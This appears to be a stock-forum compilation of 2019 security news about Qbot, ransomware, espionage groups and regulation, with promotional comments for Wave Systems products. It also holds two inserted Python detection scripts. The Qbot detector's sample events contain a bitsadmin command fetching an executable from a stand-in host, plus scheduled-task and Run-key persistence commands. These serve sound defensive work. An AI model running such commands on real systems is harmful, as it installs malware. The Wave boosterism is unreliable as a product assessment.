Nation-state threat actors are continuing to evolve and change – Through ongoing tracking of threat actors from North Korea, Russia, China, Iran, and other countries, FireEye has observed these actors continually enhancing their capabilities and changing their targets in alignment with their political and economic agendas. Significant investments have provided these actors with more sophisticated tactics, tools, and procedures, with some becoming more aggressive, and others better at hiding and staying persistent for longer periods of time.
Attackers are becoming increasingly persistent – FireEye data provides evidence that organizations which have been victims of a targeted compromise are likely to be targeted again. Global data from 2018 found that 64 percent of all FireEye managed detection and response customers who were previously Mandiant incident response clients were targeted again in the past 19 months by the same or similarly motivated attack group, up from 56 percent in 2017.
Many attack vectors used to get to targets, including M&A activity – Attacker activity touches countries across the globe. Among them, FireEye observed an increase in compromises through phishing attacks during mergers & acquisitions (M&A) activity. Attackers are also targeting data in the cloud, including cloud providers, telecoms, and other service providers, in addition to re-targeting past victim organizations.
Advice for organizations
“We observed an increase in phishing attacks where a compromised email account was used to send phishing emails to additional users in the organization. This is particularly effective in M&A situations, since employees expect communication, sometimes unsolicited, between the organizations,” the company noted.
“Attackers also leveraged access to compromised email accounts to bypass multi-factor authentication. [We] observed bypasses of SMS-based, email-based, and software-based security token (soft-token) multi-factor authentication.”
For organizations involved in the M&A process, FireEye recommends conducting a compromise assessment of the acquisition to attempt to identify any current or previous compromises and a proactive review searching for evidence of potential attacker activity within the acquiring and acquired networks before integrating them.
They also urge them to:
• Audit rights to identify accounts with access to other users’ email
• Disallow the automatic forwarding of email outside the organization or regularly audit the forwarding rules on their organization’s mail servers to detect evidence of this technique
• Enable audit logging on O365
• Enable multi-factor authentication on O365.
The report also lays out preventative best practices organizations should implement to keep attackers out, as well as common issues that often need to be fixed.
=================================================================
Intrusions being discovered in 50 days?????
How about only known devices being allowed on the network so these unknown devices won't be undiscovered for 50 days!? The unknown devices won't be allowed on the network to even have an intrusion!!!
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
=================================================================
The article makes mention of software tokens (i.e. RSA SecurID) being bypassed. The links for Wave VSC 2.0 below really show what two factor authentication should be for a lot more organizations!!
https://www.wavesys.com/products/wave-virtual-smart-card
See the link within this link for more information on RSA Securid
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
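The mailbox checks FireEye recommends above (audit who holds rights to other users' mail, audit forwarding rules for external forwarding) as an added example; this is not code from the original post or the M-Trends report. It runs over constructed records whose field names follow the shape of Exchange cmdlet output (Get-Mailbox, Get-InboxRule, Get-MailboxPermission); the mailboxes, domains and ORG_DOMAINS set are assumptions.

```python
"""Audit for the account-takeover pattern in the M-Trends excerpt: inbox rules or mailbox
settings that forward mail outside the organisation, and accounts with FullAccess to other
users' mailboxes. Added example; data below is constructed, not a real export."""
import re
from dataclasses import dataclass

ORG_DOMAINS = {"corp.example", "acquired.example"}  # assumption: both sides of the M&A deal
# Exchange renders rule recipients as '"Display Name" [SMTP:addr]' or as a bare address.
_SMTP_RE = re.compile(r"\[SMTP:([^\]]+)\]", re.IGNORECASE)

@dataclass(frozen=True)
class Finding:
    mailbox: str   # mailbox whose mail is exposed
    kind: str      # external-forwarding | external-rule | delegated-full-access
    detail: str

def extract_address(recipient: str) -> str:
    """Normalise a recipient string to a lower-case SMTP address."""
    m = _SMTP_RE.search(recipient)
    addr = m.group(1) if m else recipient
    if addr.lower().startswith("smtp:"):   # ForwardingSmtpAddress carries an 'smtp:' prefix
        addr = addr[5:]
    return addr.strip().strip('"').lower()

def is_external(addr: str) -> bool:
    return addr.rpartition("@")[2] not in ORG_DOMAINS

def audit_mailbox_forwarding(mailboxes):
    """Mailbox-level forwarding set by an admin or by whoever holds the account."""
    findings = []
    for mb in mailboxes:
        target = mb.get("ForwardingSmtpAddress")
        if target and is_external(extract_address(target)):
            findings.append(Finding(mb["PrimarySmtpAddress"], "external-forwarding",
                                    extract_address(target)))
    return findings

def audit_inbox_rules(rules):
    """Enabled inbox rules that forward or redirect to addresses outside the organisation."""
    findings = []
    for rule in rules:
        if not rule.get("Enabled", True):
            continue  # only active rules are a live exfiltration path
        targets = []
        for field in ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo"):
            targets.extend(extract_address(r) for r in (rule.get(field) or []))
        external = sorted({a for a in targets if is_external(a)})
        if external:
            # forwarding paired with deletion hides the traffic from the mailbox owner
            suffix = " (and deletes the original)" if rule.get("DeleteMessage") else ""
            findings.append(Finding(rule["MailboxOwnerId"], "external-rule",
                                    f"rule {rule['Name']!r} -> {', '.join(external)}{suffix}"))
    return findings

def audit_mailbox_permissions(perms):
    """Accounts holding FullAccess to someone else's mailbox (the rights FireEye says to audit)."""
    findings = []
    for p in perms:
        user = p["User"].lower()
        if user.startswith("nt authority\\") or user.startswith("s-1-5-"):
            continue  # the owner itself and orphaned SIDs are not delegations to review here
        if "FullAccess" in p["AccessRights"]:
            findings.append(Finding(p["Identity"], "delegated-full-access", user))
    return findings

def audit_all(export):
    return (audit_mailbox_forwarding(export["mailboxes"])
            + audit_inbox_rules(export["inbox_rules"])
            + audit_mailbox_permissions(export["permissions"]))

# Constructed sample export (not real data).
SAMPLE_EXPORT = {
    "mailboxes": [
        {"PrimarySmtpAddress": "alice@corp.example",
         "ForwardingSmtpAddress": "smtp:alice.backup@freemail.example"},
        {"PrimarySmtpAddress": "bob@corp.example", "ForwardingSmtpAddress": None},
    ],
    "inbox_rules": [
        # one-character rule name plus forward-and-delete: typical of an attacker-created rule
        {"MailboxOwnerId": "bob@corp.example", "Name": ".", "Enabled": True,
         "ForwardTo": ['"Exec" [SMTP:exec@mail-drop.example]'], "DeleteMessage": True},
        # legitimate cross-company rule during the acquisition: both domains are in ORG_DOMAINS
        {"MailboxOwnerId": "carol@acquired.example", "Name": "Deal team", "Enabled": True,
         "ForwardTo": ['"Alice" [SMTP:alice@corp.example]'], "DeleteMessage": False},
        {"MailboxOwnerId": "dave@corp.example", "Name": "old", "Enabled": False,
         "RedirectTo": ["x@outside.example"], "DeleteMessage": False},
    ],
    "permissions": [
        {"Identity": "ceo@corp.example", "User": "NT AUTHORITY\\SELF", "AccessRights": ["FullAccess"]},
        {"Identity": "ceo@corp.example", "User": "helpdesk-temp@corp.example",
         "AccessRights": ["FullAccess"]},
    ],
}

if __name__ == "__main__":
    for f in audit_all(SAMPLE_EXPORT):
        print(f"{f.kind:22} {f.mailbox:26} {f.detail}")
```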
Qbot malware resurfaces in new attack against businesses
https://www.csoonline.com/article/3345972/qbot-malware-resurfaces-in-new-attack-against-businesses.html
This new persistent and difficult-to-detect Qbot version is designed to steal financial information.
The decade-old Qbot financial malware has resurfaced with an improved version in a new attack against businesses that has infected thousands of systems so far. Researchers from data security solutions provider Varonis have uncovered the attack after a customer alerted them about suspicious activity on a computer. The culprit turned out to be an infection with a new strain of Qbot, also known as Qakbot, that was trying to spread to other systems on the network.
Qbot is one of the most successful malware families of the past decade, in part because its source code is available to cybercriminals, so it can be easily modified and extended. The malicious program started out as a Trojan designed to steal online banking credentials, but has received many improvements over the years.
Qbot interestingly is a semi-polymorphic threat because its command-and-control servers re-scramble the code and configuration periodically to evade signature-based antivirus detection. The threat also has worm-like capabilities that allow it to move laterally through corporate networks by brute-forcing Windows domain credentials.
How the new Qbot attack works
In the attack investigated by Varonis, the initial installer or "dropper" was likely delivered as an email attachment with the extension .doc.vbs. VBS is a scripting language that's natively supported on Windows.
If executed, the malicious script downloads the Qbot loader from a command-and-control server using the Windows BITSAdmin command-line tool. Previous Qbot versions used PowerShell for this purpose, but since PowerShell has become a common malware delivery method, its use is closely monitored on enterprise systems. "The loader, which executes the core malware, has multiple versions and is constantly updating even after execution," the Varonis researchers said in their report.
The version received by the victim depends on a parameter hard-coded in the VBS file, so there are possibly different email campaigns targeting different types of users and organizations. Furthermore, Varonis has found loaders that were digitally signed with eight different code-signing certificates that were likely stolen from various entities.
If a file is digitally signed, it does not mean that it's not malicious, just like if a website uses HTTPS, it does not mean that it's not hosting malware or phishing pages. However, digitally signed files trigger less scary warnings in Windows and are sometimes trusted automatically by poorly configured endpoint security agents or file whitelisting solutions.
Once installed, Qbot creates scheduled tasks and adds entries to the system registry to achieve persistence. The malware then starts recording all keystrokes typed by users, steals credentials and authentication cookies saved inside browsers, and injects malicious code into other processes to search for and steal financial-related text strings.
Varonis gained access to one of the command-and-control servers used by the attackers and found logs showing 2,726 unique victim IP addresses. More than 1,700 were located in the U.S., but victims were also found in Canada, the U.K., Germany, France, Brazil, South Africa, India, China and Russia.
Since computers inside an organization typically access the internet through a shared IP address, the researchers believe the number of individually infected systems to be much larger. Also, logs showed that many of the compromised systems had antivirus programs from various vendors installed, highlighting once again Qbot's ability to evade antivirus detection.
=================================================================
Wave Endpoint Monitor and Wave VSC 2.0 are quite unique and powerful when they both are utilized. The highlighted sections in the article above and the links below reveal reasons why the two Wave solutions are fundamental 'must haves' amongst the cybersecurity choices.
==================================================================
https://www.wavesys.com/malware-protection
https://www.wavesys.com/products/wave-endpoint-monitor
https://www.wavesys.com/products/wave-virtual-smart-card
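The Qbot chain the CSO article describes (script host launching a double-extension attachment, BITSAdmin fetching the loader, scheduled-task and Run-key persistence) expressed as detection logic over process-creation events, as an added example that is not code from the article or Varonis. The events, hosts, paths and the example.invalid domain are constructed; the field names are an assumption modelled on Sysmon process-creation records.

```python
"""Correlate process-creation events into the Qbot stages described in the article.
Added example; sample events are constructed and the chain is reported per host only when
more than one stage is seen, which keeps single benign matches below the alert line."""
import re
from collections import defaultdict

SCRIPT_HOSTS = ("\\wscript.exe", "\\cscript.exe")
# Double extension such as invoice.doc.vbs: document-looking name, script-host extension.
DOUBLE_EXT = re.compile(r"\.(doc|docx|xls|xlsx|pdf|txt)\.(vbs|vbe|js|jse|wsf)\b", re.IGNORECASE)
# Parent binaries living in user-writable paths are where a freshly dropped loader runs from.
USER_WRITABLE = re.compile(r"\\(appdata|temp|downloads|public)\\", re.IGNORECASE)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\b", re.IGNORECASE)

def _is(image, name):
    return image.lower().endswith("\\" + name)

def classify(ev):
    """Return (stage, reason) when the event matches one step of the chain, else None."""
    img, parent, cmd = ev["image"], ev["parent_image"], ev["cmdline"]
    low = cmd.lower()
    if img.lower().endswith(SCRIPT_HOSTS) and DOUBLE_EXT.search(cmd):
        return ("initial-access", "script host launched a double-extension file")
    if (_is(img, "bitsadmin.exe") and "/transfer" in low and "http" in low
            and parent.lower().endswith(SCRIPT_HOSTS)):
        return ("download", "bitsadmin transfer spawned by a script host")
    if _is(img, "schtasks.exe") and "/create" in low and USER_WRITABLE.search(parent):
        return ("persistence", "scheduled task created by a binary in a user-writable path")
    if _is(img, "reg.exe") and RUN_KEY.search(cmd) and USER_WRITABLE.search(parent):
        return ("persistence", "Run key modified by a binary in a user-writable path")
    return None

def detect_qbot_chains(events, min_stages=2):
    """Group matches by host; alert on hosts showing at least min_stages distinct stages."""
    per_host = defaultdict(list)
    for ev in events:
        hit = classify(ev)
        if hit:
            per_host[ev["host"]].append((hit[0], hit[1], ev["cmdline"]))
    alerts = {}
    for host, hits in per_host.items():
        stages = sorted({stage for stage, _, _ in hits})
        if len(stages) >= min_stages:
            alerts[host] = {"stages": stages, "hits": hits}
    return alerts

# Constructed sample: WS01 shows the full chain, WS02 only benign admin activity.
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "cmdline": r'wscript.exe "C:\Users\jdoe\Downloads\invoice_0219.doc.vbs"'},
    {"host": "WS01", "image": r"C:\Windows\System32\bitsadmin.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"bitsadmin /transfer upd /download /priority high "
                r"http://cdn.example.invalid/u/x.png C:\Users\jdoe\AppData\Local\Temp\upd.exe"},
    {"host": "WS01", "image": r"C:\Windows\System32\schtasks.exe",
     "parent_image": r"C:\Users\jdoe\AppData\Local\Temp\upd.exe",
     "cmdline": r'schtasks /create /tn "Updater" /tr "C:\Users\jdoe\AppData\Local\Temp\upd.exe" /sc minute /mo 5'},
    {"host": "WS01", "image": r"C:\Windows\System32\reg.exe",
     "parent_image": r"C:\Users\jdoe\AppData\Local\Temp\upd.exe",
     "cmdline": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v upd /t REG_SZ /d "C:\Users\jdoe\AppData\Local\Temp\upd.exe"'},
    # benign: a domain logon script and an admin creating a task from an elevated shell
    {"host": "WS02", "image": r"C:\Windows\System32\cscript.exe",
     "parent_image": r"C:\Windows\System32\userinit.exe",
     "cmdline": r"cscript.exe \\corp.example\sysvol\corp.example\scripts\logon.vbs"},
    {"host": "WS02", "image": r"C:\Windows\System32\schtasks.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'schtasks /create /tn "Backup" /tr C:\Tools\backup.exe /sc daily'},
]

if __name__ == "__main__":
    for host, alert in detect_qbot_chains(SAMPLE_EVENTS).items():
        print(host, alert["stages"])
        for stage, reason, cmd in alert["hits"]:
            print(f"  [{stage}] {reason}: {cmd}")
```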
Cyber espionage warning: The most advanced hacking groups are getting more ambitious
https://www.zdnet.com/article/cyber-espionage-warning-the-most-advanced-hacking-groups-are-getting-more-ambitious/
The top 20 most notorious cyber-espionage operations have increased their activity by a third in recent years - and are looking to conduct more attacks, according to a security company.
The most advanced hacking groups are becoming bolder when conducting campaigns, with the number of organisations targeted by the biggest campaigns rising by almost a third.
A combination of new groups emerging and threat actors developing successful strategies for breaking into networks has seen the average number of organisations targeted by the most active hacking groups rise from 42 between 2015 and 2017 to an average of 55 in 2018.
The figures detailed in Symantec's annual Internet Security Threat Report suggest that the top 20 most prolific hacking groups are targeting more organisations as the attackers gain more confidence in their activities.
Groups like Chafer, DragonFly, Gallmaker and others are all conducting highly targeted hacking campaigns as they look to gather intelligence against businesses they think hold valuable information.
Once attackers might have needed the latest zero-days to gain access to corporate networks, but now it's spear-phishing emails laced with malicious content that are most likely to provide attackers with the initial entry they need.
And because these espionage groups are so proficient at what they do, they have well tried-and-tested means of conducting activity once they're inside a network.
"It's like they have steps which they go through, which they know are effective to get into networks, then for lateral movement across networks to get what they want," Orla Cox, director of Symantec's security response unit told ZDNet.
"It makes them more efficient and, for organizations, it makes them harder to spot because a lot of the activity looks like traditional enterprise activity," she added.
In many of the cases detailed in the report, attackers are deploying what Symantec refers to as 'living-off-the-land' tactics: the attackers use everyday enterprise tools to help them travel across corporate networks and steal data, making the campaigns more difficult to discover.
Not only is the number of targeted campaigns on the rise, but there's a larger variety in the organisations being targeted. Organisations in sectors like utilities, government and financial services have regularly found themselves targets of organised cyber-criminal gangs, but increasingly, these groups are expanding their attacks to new targets.
"Often in the past they'd have a clear focus on one sector, but now we see these campaigns can focus on a wide variety of targets, ranging from telecoms companies, hotels, universities. It's harder to pinpoint exactly what their end goal is," said Cox.
While intelligence gathering remains the key goal of many of these campaigns, some are beginning to expand by also displaying an interest in compromising systems.
This is a particularly worrying trend, because while stealing data in itself is bad enough, attackers with the ability to operate cyber-physical systems could be much worse.
One group Symantec has observed conducting this activity is a hacking operation dubbed Thrip, which expressed particular interest in gaining control of satellite operations — something that could potentially cause major disruption.
In the face of a rise in targeted attacks, governments are increasingly pointing the finger not just at nations but individuals believed to be involved in cyber espionage. For example, the United States named individuals it claims are responsible for conducting cyber attacks: they include citizens of Russia, North Korea, Iran and China. Symantec's report suggests the indictment might disrupt some targeted operations, but it's unlikely that cyber espionage campaigns will be disappearing anytime soon.
==================================================================
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpts:
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
Key Features:
Strong Security
• Authenticate securely, encrypt email, and prove integrity of the device with one management console
• Protect against phishing, malware and other network security threats by storing authentication credentials in hardware
• Provide centralized enforcement of custom policies
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Wave VSC 2.0 can prevent a hacker from moving laterally on the network as was happening in this article.
==================================================================
https://www.wavesys.com/malware-protection
Excerpts:
Software can’t always detect malware
The big problem with malware is that antivirus software doesn’t always detect it. Anti-malware software is based on signatures of known bad software. However, there always needs to be a patient 0 that discovers he is infected, for the rest of the world to benefit from it. In the case of APTs (Advanced Persistent Threats), your organization may be the only target for the specific strand of malware. In that case, the signature detection process will not protect you. Modern anti-malware and other software packages that promise cyber security or protection from APTs would use various heuristics and "AI" (Artificial Intelligence) to detect malware based on a predefined set of behavioral parameters. A sophisticated attacker is able to fine tune the behavior of the malware he is writing against various known anti-malware software solutions, so that it can evade detection for long periods of time.
A further challenge for anti-malware software is that it commonly works at the OS level. It isn’t very good at seeing deeper into the system, where some malware lives. Malware can hide from anti-malware by feeding it false results as it lies lower in the stack.
Wave's Endpoint Monitor provides early detection for these low-lying sneaky attacks.
=================================================================
https://www.wavesys.com/products/wave-endpoint-monitor
Excerpts:
Key Features:
Easy security compliance
Data protection
• Ensures that you can trust the integrity of your measurements for central analysis
• Real-time alerts for zero-day detection of APTs
Ransomware Pretends to Be Proton Security Team Securing Data From Hackers
https://www.bleepingcomputer.com/news/security/ransomware-pretends-to-be-proton-security-team-securing-data-from-hackers/
A recent variant of the GarrantyDecrypt ransomware has been found that pretends to be from the security team for Proton Technologies, the company behind ProtonMail and ProtonVPN.
This ransomware family was found by ransomware researcher Michael Gillespie in October 2018 and while it has never achieved a large-scale distribution like other ransomware, it has seen a steady trickle of victims since it has been released.
From the submissions to ID-Ransomware, you can see a steady stream of users submitting ransom notes or encrypted files to the service.
In a recent variant discovered once again by Gillespie in February, the developers behind GarrantyDecrypt tried a new tactic of pretending to be the security team for Proton. In this ransom note, named SECURITY-ISSUE-INFO.txt, the developers state that the victim was being attacked by an "outsider" and Proton's SECURE-SERVER service encrypted the data in order to protect it during the attack.
The developers even went as far as putting "PROTON SECURE-SERVER SYSTEMS (c) 2019" copyright statement at the bottom of the note to make it appear more legitimate.
The ransom note goes on to say that Proton's SECURE-SERVER service charges a fee of $780 for securing the files during a 3rd party attack and that a victim needs to pay the fee to decrypt their files.
While I think most people would never fall for this, it is important to reiterate that this is not an email from Proton, Proton did not encrypt your data, and you are a victim of ransomware.
Unfortunately, there is no way to decrypt this ransomware, so if you have been infected by GarrantyDecrypt you should either copy the encrypted data and a copy of the ransom note to a secure location in the hopes a key will be released in the future or try to restore from a backup.
How to protect yourself from the Ransomware
In order to protect yourself from ransomware it is important that you use good computing habits and security software. The most important step is to always have a reliable and tested backup of your data that can be restored in the case of an emergency, such as a ransomware attack.
You should also make sure that you do not have any computers running remote desktop services connected directly to the Internet. Instead place computers running remote desktop behind VPNs so that they are only accessible to those who have VPN accounts on your network.
A good security software solution that incorporates behavioral detections to combat ransomware and not just use signature detections or heuristics is important as well. For example, Emsisoft Anti-Malware and Malwarebytes Anti-Malware both contain behavioral detection that can prevent many, if not most, ransomware infections from encrypting a computer.
Last, but not least, make sure you practice the following security habits, which in many cases are the most important steps of all:
• Backup, Backup, Backup!
• Do not open attachments if you do not know who sent them.
• Do not open attachments until you confirm that the person actually sent you them.
• Scan attachments with tools like VirusTotal.
• Do not connect Remote Desktop Services directly to the Internet. Instead, make sure they can only be accessed by logging into a VPN first.
• Make sure all Windows updates are installed as soon as they come out! Also make sure you update all programs, especially Java, Flash, and Adobe Reader. Older programs contain security vulnerabilities that are commonly exploited by malware distributors. Therefore it is important to keep them updated.
• Make sure you have some sort of security software installed that uses behavioral detections or white list technology. White listing can be a pain to train, but if you're willing to stick with it, it could have the biggest payoffs.
• Use hard passwords and never reuse the same password at multiple sites.
• BACKUP!
For a complete guide on ransomware protection, you can visit our How to Protect and Harden a Computer against Ransomware article.
=================================================================
SEDs and Wave SED management could help stop this sneaky ransomware!! Wave Endpoint Monitor could help as well! For a list and summaries of all of Wave's outstanding cybersecurity solutions and old but important news (the VSC 2.0 related news is especially important), see the website below.
=================================================================
https://www.wavesys.com/
Will 2019 Be the Year of Blockbuster Cybersecurity Enforcement by the SEC?
https://www.law.com/newyorklawjournal/2019/02/26/will-2019-be-the-year-of-blockbuster-cybersecurity-enforcement-by-the-sec/?slreturn=20190201181543
Excerpts:
Firms that have yet to dedicate sustained attention to their cyber threats and risks may find that the SEC is far more willing to use a stick rather than a carrot to obtain compliance.
After years of admonishing financial institutions and public companies to take cybersecurity more seriously, the U.S. Securities and Exchange Commission (SEC) appears ready to back up its words with investigations and penalties. Starting with Jay Clayton’s confirmation as SEC Chair in 2017, the agency has enhanced its efforts to protect investors and markets from increasingly dangerous and costly cyber threats. Indeed, the SEC’s conduct over the past two years—including creating a dedicated Cyber Unit in its Enforcement Division and by bringing several first-of-their-kind cybersecurity enforcement actions—foretells that the agency is prepared to take an even more aggressive approach in addressing cybersecurity issues among the entities it supervises. As a result, firms that have yet to dedicate sustained attention to their cyber threats and risks may find that the SEC is far more willing to use a stick rather than a carrot to obtain compliance.
Conclusion
The SEC has, in the past, largely taken a softer approach to encouraging compliance in the cyber-security arena, but the agency now appears ready to bring significant enforcement actions for cyber-related missteps. Public companies and entities registered with the SEC would do well to heed the SEC’s admonitions and take a close and careful look at their cybersecurity-related policies and procedures to ensure full compliance.
=================================================================
Better security!! - https://www.wavesys.com/
Deadline passes for companies to comply with New York's cybersecurity regulation
https://investorshub.advfn.com/secure/post_new.aspx?board_id=17
Time’s up for major banks, insurers and many of the companies they work with to comply with a New York State cybersecurity regulation that requires more data protection measures than anywhere else in the country.
The New York State Department of Financial Services Cybersecurity Regulation goes into full effect Friday, two years after officials began to put it in place.
“The Department has provided a two year transitional period to address these risks and expects Covered Entities to have completed a thorough due diligence process on all Third Party Service Providers by March 1, 2019,” the department said in an informational page.
The rules require DFS-covered entities including financial firms, mortgage brokers, charities and Health Maintenance Organizations to use encryption, multi-factor authentication and tighter third party risk assessments, such as penetration tests, to limit outsiders’ access to corporate data. Covered entities also must notify regulators about a data breach within 72 hours and appoint an executive to lead corporate security efforts.
DFS has not provided details about possible penalties for compliance failures.
Many financial firms already have the necessary boxes checked, though numerous legal experts have predicted the regulation will echo throughout the private sector. The rule covers firms and international subsidiaries operating in New York City, along with the rest of the state, requiring firms to meet a higher security baseline.
By requiring third party assessments, penetration tests, and audit trails, the logic goes, lawyers and security practitioners may force their corporate partners to raise their own standards. The European Union’s General Data Protection Regulation, which also includes a 72-hour breach notification stipulation, similarly has forced a corporate security reckoning.
DFS meanwhile has not waited for the regulation to go into final effect to probe other instances of potential negligence or wrongdoing as it relates to security.
The regulator in recent weeks has sent letters to Facebook and mobile app developers after Gov. Andrew Cuomo’s office sought more information about technology companies leveraging user data without consent.
Last year, DFS was among the regulators which ordered Equifax to take remediation steps following the 2017 data breach that compromised information on nearly 150 million people.
==================================================================
The good news for companies out of compliance is that there is a company like Wave that has better security. And other companies carrying solutions that are under par after pen testing could find that they get much better security with Wave!! Stellar encryption and MFA are very important here and are what Wave could be a tremendous help with (see links below)!
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/wave-self-encrypting-drive-management
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
https://www.wavesys.com/
Microsoft opens top-tier Defender ATP security to Windows 7 PCs
https://www.computerworld.com/article/3342215/microsoft-windows/microsoft-opens-top-tier-defender-atp-security-to-windows-7-pcs.html
Windows Defender ATP, which can detect ongoing attacks on corporate networks and recommend a response, is now available for Windows 7 and 8.1.
Microsoft's Windows Defender Advanced Threat Protection (ATP) service is now available for PCs running Windows 7 and Windows 8.1.
The decision to add devices powered by those operating systems was first announced a year ago. At the time, Microsoft said ATP's Endpoint Detection & Response (EDR) functionality would be available for the older OSes by summer 2018.
Windows Defender ATP is a service that detects ongoing attacks on corporate networks, then follows up to investigate the attack or breach and provides response recommendations and attack remediation. Software baked into Windows 10 detects attacks, while a central management console allows IT administrators to monitor the status of covered devices and react if necessary. Adding the EDR client software to Windows 7 and Windows 8.1 PCs gives enterprise IT the same visibility into those machines as it has had into Windows 10 systems.
Both last year and last week, Microsoft explained the extension of ATP coverage as a way for companies to better protect their environments when they're part way through a Windows 10 migration. "To help customers stay secure while upgrading to Windows 10, we've built an EDR solution for Windows 7 and Windows 8.1 that is simple to deploy and seamless to end-users," wrote Heike Ritter, a security product manager on the ATP team, in a post to a company blog.
Windows Defender ATP is a component within the most expensive Windows 10 licenses, such as those provided by the subscription-based Windows 10 Enterprise E5 or Microsoft 365 E5. (The company touts ATP as the differentiator between those SKUs (stock-selling units) and the tier-lower bundles.) Microsoft now also sells ATP as an add-on to Microsoft 365 E3 - one of those lower-tier subscriptions - for an extra $12 per user per month.
Microsoft put into place the Windows 7 integration just 11 months before the operating system is set to fall off the company's support list. (Windows 8.1 simply doesn't matter; not only was it largely ignored by businesses, its January 2019 user share was only 6% of all Windows PCs.) Given the late date - again, Microsoft originally had aimed for a mid-2018 launch date for inclusion of Windows 7 - the firm may be mostly counting on adoption by customers who will pay for extending Windows 7 support. That additional support, labeled "Windows 7 Extended Security Updates" (ESU), will be sold in one-year increments for up to three years, with prices ranging from $25 to $200 per PC per year.
Because Microsoft wants customers to migrate as many machines as possible to Windows 10's Enterprise - the most expensive of the operating system's editions - it discounts ESU to subscribers of Windows 10 Enterprise and Microsoft 365 Enterprise. Coincidentally, those are the same licenses - their E5 versions, specifically - that are required for Windows Defender ATP. Microsoft may be hoping that ATP's availability will prompt customers to obtain Windows 10 Enterprise or Microsoft 365 Enterprise licenses for their Windows 7 machines now, so that IT can configure the covered PCs now, rather than later, after support runs out.
More information about ATP and Windows 7, including instructions for including Windows 7 PCs in ATP monitoring, is available on Microsoft's website.
=================================================================
It costs an extra $12 a month for Defender ATP as pointed out in the article. Wave solutions can help security and budget conscious organizations. The website below is relatively straightforward, and if thoroughly read contains many clues as to what the picture of successful cybersecurity should look like.
=================================================================
https://www.wavesys.com/
Payroll Provider Gives Extortionists a Payday
https://krebsonsecurity.com/2019/02/payroll-provider-gives-extortionists-a-payday/
Payroll software provider Apex Human Capital Management suffered a ransomware attack this week that severed payroll management services for hundreds of the company’s customers for nearly three days. Faced with the threat of an extended outage, Apex chose to pay the ransom demand and begin the process of restoring service to customers.
Roswell, Ga. based Apex HCM is a cloud-based payroll software company that serves some 350 payroll service bureaus that in turn provide payroll services to small and mid-sized businesses. At 4 a.m. on Tuesday, Feb. 19, Apex was alerted that its systems had been infected with a destructive strain of ransomware that encrypts computer files and demands payment for a digital key needed to unscramble the data.
-see link for more info
The company quickly took all of its systems offline, and began notifying customers that it was trying to remediate a security threat. Over a series of bi-hourly updates, Apex kept estimating that it expected to restore service in a few hours, only to have to walk back those estimates almost every other time a new customer update went out.
Contacted Wednesday by an Apex client who was nervous about being unable to make this week’s payroll for his clients, KrebsOnSecurity reached out to Apex for comment. Ian Oxman, the company’s chief marketing officer, said the ransomware never touched customer data, but instead encrypted and disrupted everything in the company’s computer systems and at its off-site disaster recovery systems.
“We had just recently completed a pretty state-of-the-art disaster recovery plan off-site out and out of state that was mirroring our live system,” Oxman said. “But when the ransomware bomb went off, not only did it go through and infect our own network, it was then immediately picked up in our disaster recovery site, which made switching over to that site unusable.”
Oxman said Apex hired two outside security firms, and by Feb. 20 the consensus among all three was that paying the ransom was the fastest way to get back online. The company declined to specify how much was paid or what strain of ransomware was responsible for the attack.
“We paid the ransom, and it sucked,” Oxman said. “In respect for our clients who needed to get their businesses up and running that was going to be obviously the quicker path.”
Unfortunately for Apex, paying up didn’t completely solve its problems. For one thing, Oxman said, the decryption key they were given after paying the ransom didn’t work exactly as promised. Instead of restoring all files and folders to their pre-encrypted state, the decryption process broke countless file directories and rendered many executable files inoperable — causing even more delays.
“When they encrypt the data, that happens really fast,” he said. “When they gave us the keys to decrypt it, things didn’t go quite as cleanly.”
One of Apex’s older business units — ACA OnDemand — is still offline, but the company is now offering to move customers on that platform over to newer (and more expensive) software-as-a-service systems, and to train those customers on how to use them.
Experts say attacks like the one against Apex HCM are playing out across the world every day, and have turned into a billion-dollar business for cyber thieves. The biggest group of victims are professional services firms, according to a study by NTT Security.
Ransomware victims perhaps in the toughest spot include those offering cloud data hosting and software-as-service, as these businesses are completely unable to serve their customers while a ransomware infestation is active.
The FBI and multiple security firms have advised victims not to pay any ransom demands, as doing so just encourages the attackers and in any case may not result in actually regaining access to encrypted files.
In practice, however, many cybersecurity consulting firms are quietly urging their customers that paying up is the fastest route back to business-as-usual. It’s not hard to see why: Having customer data ransomed or stolen can spell the end of cloud-based business, but just being down for more than a few days can often be just as devastating. As a result, the temptation to simply pay up may become stronger with each passing day — even if the only thing being ransomed is a bunch of desktops and servers.
